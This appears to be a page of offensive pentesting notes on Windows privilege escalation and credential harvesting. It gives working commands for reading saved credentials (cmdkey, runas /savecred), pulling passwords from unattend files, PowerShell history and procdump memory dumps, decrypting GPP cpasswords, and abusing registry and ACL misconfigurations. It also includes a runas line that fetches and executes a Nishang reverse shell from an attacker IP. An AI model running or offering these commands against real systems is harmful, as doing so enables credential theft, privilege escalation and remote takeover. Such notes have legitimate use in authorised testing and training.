Windows

Unnattended Installation

Unattend.xml is an answer file for installation. The files may contain encoded or plain-text credentials and other sensitive information.

These files contain base64-encoded user account and system information

C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Autounattend.xml

Windows Credential Manager

In the production server for some operation, an admin requires to enter the credentials repeatedly. Also, users save their credentials to the Credential Manager for quick access. Credential manager stores Web and Windows Credentials.

Assume that for a moment an attacker got access to the system physically or remotely. Then, it would be easy to access those credentials and to run an application with it.

For checking al the stored credentials:

cmdkey /list

We will not see the password, but we can use runas to authenticate as the user which have credentials:

runas.exe /savecred /user:administrator cmd

// Hosting Nishang shell
runas.exe /user:ACCESS\Administrator /savecred "powershell -c IEX (New-Object Net.Webclient).downloadstring('http://10.10.14.2/rev.ps1')"

PowerShell History

PowerShell.exe terminal stores all the PS commands history in a text file. When an administrator has used hard-coded credentials to perform any operation on the regular user i.e student user environment using PowerShell then, it would become necessary to clean the PowerShell command history. If an administrator forgets to clean up the history, then the admin user has exposed some sensitive information like credentials, configuration settings, etc.

The default location for the PowerShell command history:

C:\Users\Test\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

type $env:AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Process Memory

To check the processes running:

ps

Then you can dump all the proccess information:

// Search the pid
ps | findstr "<process>"

.\procdump64.exe -accepteula -ma <id>

Then use strings to check passwords:

strings <file> | grep pass

Registry Autoruns

Autoruns for system startup:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunREG

Autoruns for user login

HKEY_LOCAL_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Configurations for Windows Services which can run with elevated privileges

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services

Enumeration

To check the programs which are configured to start on system startup:

Get-ACL -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' |
Format-List

If a normal user haves Full Control we can use as a privilege escalation technique

ACLS

We can check for ACL misconfigurations using icacls

icacls /path

If we have Full controll against a folder, we can grant this user permissions for accessing a file inside this folder using this command:

icacls file /grant user:f

SYSVOL & GPP (MS14-025)

findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml

gpp-decrypt "password"

AlwayInstalled

Enumerate common registry keys and if AlwaysInstallElevated is enabled we can exploit that

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

PreviousPRIVILEGE ESCALATION NextEnumeration

Last updated 8 months ago

hashtagUnnattended Installation

hashtagWindows Credential Manager

hashtagPowerShell History

hashtagProcess Memory

hashtagRegistry Autoruns

hashtagEnumeration

hashtagACLS

hashtagSYSVOL & GPP (MS14-025)

hashtagAlwayInstalled